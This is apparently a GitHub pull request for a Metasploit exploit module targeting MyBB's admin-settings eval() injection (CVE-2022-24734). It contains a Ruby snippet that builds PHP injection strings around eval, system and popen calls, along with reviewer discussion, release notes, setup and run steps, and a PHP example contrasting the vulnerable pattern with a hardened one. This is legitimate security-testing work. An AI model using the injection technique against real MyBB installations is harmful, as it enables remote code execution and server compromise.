MyBB Admin Control Code Injection RCE (CVE-2022-24734) #16607
Conversation
case target['Platform'] | ||
when 'php' | ||
cmd = cmd.gsub(/"/, '"' => '\\"') | ||
cmd = cmd.gsub(/\$/, '$' => '\\$') | ||
extra = "\" . eval(\"#{cmd}\") .\"" | ||
when 'win' | ||
cmd = cmd.gsub(/'/, "'" => "\\'") | ||
if target['Arch'] == ARCH_CMD | ||
# Force cmd to run in the background (only works for `cmd`) | ||
extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\"" | ||
else | ||
extra = "\" . system('#{cmd}') .\"" | ||
end | ||
else | ||
cmd = cmd.gsub(/'/, "'" => "\\'") | ||
extra = "\" . system('#{cmd} > /dev/null &') .\"" | ||
end |
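Review bot: the `when 'win'` and `else` branches repeat the same `cmd.gsub(/'/, "'" => "\\'")` escaping, and all three branches hand-build the same `"\" . <php> .\""` wrapper, so the string context this depends on is stated nowhere in the snippet; hoist the wrapper into one helper (or the mixin the thread discusses) and add a comment saying that `extra` is spliced into a double-quoted PHP string that is then passed to eval(), which is why the 'php' branch escapes `"` and `$` while the other two escape `'`.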
This feels like a PHP utility function for staging commands via PHP.
Especially because you might want to add alternatives if system and popen are blocked :)
Yes, I agree, it is certainly a good start for such a helper. However, it is very specific to how the PHP code is being injected. Here, the injection occurs in an eval(), as a simple concatenation to a string.
Thanks for the review @smcintyre-r7, @jmartin-r7, @jvoisin and @jheysel-r7. I pushed some updates to address your feedback. @jvoisin, in relation to this comment: that would be interesting to provide alternatives to
Moving it to a mixin would make sense, since this is kinda off-topic in this module I think.
Thanks @cdelafuente-r7 for the great module! Code looks great and testing provided the expected output on both linux and windows installs:
Linux (target 0 - PHP)
Linux (target 1 - Unix (In-Memory))
Linux (target 2 - linux (Dropper))
Windows (target 0 - PHP)
Windows (target 3 - PowerShell (In-Memory))
Windows (target 4 - Windows (In-Memory))
Release Notes
Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to
This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. The MyBB Admin Control settings page calls the PHP eval function with unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting. Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, the MyBB administrator role).
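The description above names the root cause: a settings value is concatenated into a string that is then handed to PHP's eval(). As an added, generic illustration (not MyBB's code and not the module's), the block below shows that pattern beside a version that never evaluates user-controlled text: setting names are checked against a strict pattern, values are serialised with var_export(), and the generated file is only ever include()d as data. All function names and the sample input are constructed for this example.

```php
<?php
// Added illustration, not MyBB code. Two ways of turning an array of
// settings into PHP: one that concatenates raw values into code that is
// passed to eval(), and one that emits values as escaped literals only.

// VULNERABLE PATTERN: $value lands inside a double-quoted PHP string
// literal untouched. A '"' in the value closes the literal early and
// whatever follows is parsed and executed as PHP by eval().
function render_settings_vulnerable(array $settings): string
{
    $php = '';
    foreach ($settings as $name => $value) {
        $php .= '$config[\'' . $name . '\'] = "' . $value . '";' . "\n";
    }
    return $php;
}

function apply_settings_vulnerable(array $settings): array
{
    $config = [];
    eval(render_settings_vulnerable($settings)); // user text reaches eval()
    return $config;
}

// HARDENED PATTERN: names must match a fixed alphabet, every value is
// coerced to a string and var_export() writes it as a single-quoted PHP
// literal with backslashes and quotes escaped, so no user text can ever
// be parsed as code. Nothing is eval()ed.
function render_settings_safe(array $settings): string
{
    foreach (array_keys($settings) as $name) {
        if (!preg_match('/\A[a-z0-9_]{1,64}\z/', (string) $name)) {
            throw new InvalidArgumentException("invalid setting name: $name");
        }
    }
    $literal = var_export(array_map('strval', $settings), true);
    return "<?php\n\$config = " . $literal . ";\n";
}

function apply_settings_safe(array $settings, string $path): array
{
    // Written atomically and read back with include; the file defines
    // $config in this scope as plain data.
    file_put_contents($path, render_settings_safe($settings), LOCK_EX);
    include $path;
    return $config;
}

// Constructed sample input: a value that contains a double quote.
$sample = ['sitename' => 'My "quoted" forum'];

// Prints code in which the string literal ends after 'My ' and the rest
// of the value would be executed by eval() in apply_settings_vulnerable().
echo render_settings_vulnerable($sample);

// Prints a literal where the quotes are inside a properly escaped string.
echo render_settings_safe($sample);
```

The point of the hardened variant is not the regex on the name but the absence of eval(): once values are written with var_export() and read back with include(), a quote or backslash in the value is a character in a string, not a boundary between data and code. Running the two echo lines side by side on the sample input shows the difference in what the PHP parser would see.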
Installation Steps
Linux with Docker
docker-compose.yml file (see this): nginx/default.conf
docker-compose up
http://127.0.0.1:8080/install and finish the installation process.
Windows with Nginx, PHP and MySQL
C:\php
C:\nginx
C:\nginx\nginx.conf
Verification Steps
use exploit/multi/http/mybb_rce_cve_2022_24734
run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>
Options
USERNAME
The username of a privileged MyBB account. It must have rights to add or update settings (usually with the administrator role).
PASSWORD
The password of the MyBB account.
Scenarios
Windows (target 0 - PHP)
Linux (target 0 - PHP)
Linux (target 1 - Unix (In-Memory))
Linux (target 2 - linux (Dropper))
Windows (target 3 - PowerShell (In-Memory))
Windows (target 4 - Windows (In-Memory))
Windows (target 5 - Windows (Dropper))